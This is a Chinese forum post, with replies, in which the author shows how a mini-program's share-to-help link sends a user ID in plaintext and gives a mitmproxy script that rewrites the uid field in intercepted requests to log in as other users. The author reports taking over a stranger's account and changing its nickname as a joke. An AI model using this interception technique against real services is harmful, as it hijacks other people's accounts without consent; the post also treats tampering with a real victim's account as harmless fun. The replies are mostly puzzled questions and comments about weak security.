某小程序通过助力链接盗号

查看 95|回复 9
作者:418   
又是上一个小程序,开发出来挨打(不是)
助力玩法如下
[url=]image-20241104134623869.png[/url]
转发到群里,别人点进去就算助力成功
[url=]image-20241104134709385.png[/url]
浅浅抓个包,发现助力的jid(用户凭证)明文传输
[url=]image-20241104123656763.png[/url]
于是用mitmproxy写了个脚本
from mitmproxy import http
from multy_account.account import uid_list
def request(flow: http.HTTPFlow) -> None:
    # pretty_host takes the "Host" header of the request into account,
    # which is useful in transparent mode where we usually only have the IP
    # otherwise.
    if flow.request.pretty_host == "xxx.xxxxxx.com":
        print(flow.request.url)
        # print(flow.request.urlencoded_form['uid'])
        if flow.request.urlencoded_form['uid']:
            flow.request.urlencoded_form['uid'] = uid_list[2]
再次刷新小程序,成功获取到别人的账号
随机修改一位幸运观众的昵称 :D
javascript:;

助力, 程序

AGLJX0651   

看不懂就问,这是干什么用的
YSYM1003   

看不懂就问,这是干什么用的
Ly1988   

看不懂就问,这是干什么用的
慕浟佳〃井少年   

外包开发的吧或者是不注重安全的小公司
soyadokio   

这世界本就是个草台班子
wd12826   

看不懂就问,这是干什么用的
ok748521   

坑人的东西太多太多太多了
gggod   

这属于越权吧,没有鉴权呀直接uid登陆了吗
lauded   

感谢楼主分享
您需要登录后才可以回帖 登录 | 立即注册

返回顶部